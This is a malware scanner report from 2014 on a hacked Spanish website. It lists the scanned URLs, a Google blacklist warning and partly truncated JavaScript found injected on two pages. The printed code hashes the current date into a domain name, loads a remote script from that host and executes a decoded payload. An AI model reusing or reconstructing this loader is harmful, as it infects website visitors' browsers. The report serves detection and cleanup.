Malware Scanner report for x-pro.es

Malicious/Suspicious/Total urls checked: 2/0/21

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "x-pro.es" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=x-pro.es

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://x-pro.es/	HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:12 GMT Location: http://www.x-pro.es/ Server: Apache Content-Length: 228 Content-Type: text/html; charset=iso-8859-1	clean
http://www.x-pro.es/	200 OK Content-Length: 32341 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,3 ... 2895 bytes are skipped ...(i,i+72);for(x=0;x<o.length;x++){c=e[o.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){r+=w((b>>>(l-=8))%256);}}}return r;};function runonload(){if(!document.body){setTimeout(runonload, 50);}else {var s=document.createElement("SCRIPT");s.src="http://" + hashdate().toString(16) + ".eu/script.html?"+Math.random();document.body.appendChild(s); }};window.cback=function(p){var s = document.createElement("SCRIPT");s.text = dbc(p).replace(/+/,'');document.body.appendChild(s);};runonload(); Antivirus reports:
http://www.x-pro.es/media/system/js/mootools-core.js	200 OK Content-Length: 96362 Content-Type: application/javascript	clean
http://x-pro.es/media/system/js/core.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:13 GMT Location: http://www.x-pro.es/media/system/js/core.js Server: Apache Content-Length: 251 Content-Type: text/html; charset=iso-8859-1	clean
http://www.x-pro.es/media/system/js/core.js	200 OK Content-Length: 4784 Content-Type: application/javascript	clean
http://x-pro.es/media/system/js/caption.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:14 GMT Location: http://www.x-pro.es/media/system/js/caption.js Server: Apache Content-Length: 254 Content-Type: text/html; charset=iso-8859-1	clean
http://www.x-pro.es/media/system/js/caption.js	200 OK Content-Length: 729 Content-Type: application/javascript	clean
http://www.x-pro.es/modules/mod_slideshowck/assets/jquery.min.js	200 OK Content-Length: 93888 Content-Type: application/javascript	clean
http://www.x-pro.es/modules/mod_slideshowck/assets/jquery.easing.1.3.js	200 OK Content-Length: 8097 Content-Type: application/javascript	clean
http://www.x-pro.es/modules/mod_slideshowck/assets/jquery.mobile.customized.min.js	200 OK Content-Length: 17519 Content-Type: application/javascript	clean
http://www.x-pro.es/modules/mod_slideshowck/assets/camera.min.js	200 OK Content-Length: 39398 Content-Type: application/javascript	clean
http://www.x-pro.es/modules/mod_swmenufree/fix_wmode2transparent_swf.js	200 OK Content-Length: 2375 Content-Type: application/javascript	clean
http://www.x-pro.es/modules/mod_swmenufree/jquery.corner.js	200 OK Content-Length: 11267 Content-Type: application/javascript	clean
http://www.x-pro.es/modules/mod_swmenufree/DropDownMenuX_Packed.js	200 OK Content-Length: 12677 Content-Type: application/javascript	clean
http://x-pro.es/templates/x-pro/ie_suckerfish.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:18 GMT Location: http://www.x-pro.es/templates/x-pro/ie_suckerfish.js Server: Apache Content-Length: 260 Content-Type: text/html; charset=iso-8859-1	clean
http://www.x-pro.es/templates/x-pro/ie_suckerfish.js	200 OK Content-Length: 383 Content-Type: application/javascript	clean
http://x-pro.es/index.php/galeria	HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:18 GMT Location: http://www.x-pro.es/index.php/galeria Server: Apache Content-Length: 245 Content-Type: text/html; charset=iso-8859-1	clean
http://www.x-pro.es/index.php/galeria	200 OK Content-Length: 97902 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,3 ... 2895 bytes are skipped ...(i,i+72);for(x=0;x<o.length;x++){c=e[o.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){r+=w((b>>>(l-=8))%256);}}}return r;};function runonload(){if(!document.body){setTimeout(runonload, 50);}else {var s=document.createElement("SCRIPT");s.src="http://" + hashdate().toString(16) + ".eu/script.html?"+Math.random();document.body.appendChild(s); }};window.cback=function(p){var s = document.createElement("SCRIPT");s.text = dbc(p).replace(/+/,'');document.body.appendChild(s);};runonload(); Antivirus reports:
https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js	200 OK Content-Length: 95786 Content-Type: text/javascript	clean
http://x-pro.es/plugins/content/jw_sigpro/jw_sigpro/includes/js/jquery_fancybox/fancybox/lib/jquery.mousewheel-3.0.6.pack.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:23 GMT Location: http://www.x-pro.es/plugins/content/jw_sigpro/jw_sigpro/includes/js/jquery_fancybox/fancybox/lib/jquery.mousewheel-3.0.6.pack.js Server: Apache Content-Length: 336 Content-Type: text/html; charset=iso-8859-1	clean
http://www.x-pro.es/plugins/content/jw_sigpro/jw_sigpro/includes/js/jquery_fancybox/fancybox/lib/jquery.mousewheel-3.0.6.pack.js	200 OK Content-Length: 1384 Content-Type: application/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: x-pro.es

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 00:52:12 GMT
Location: http://www.x-pro.es/
Server: Apache
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1

...228 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: x-pro.es
Referer: http://www.google.com/search?q=x-pro.es

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for x-pro.es

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools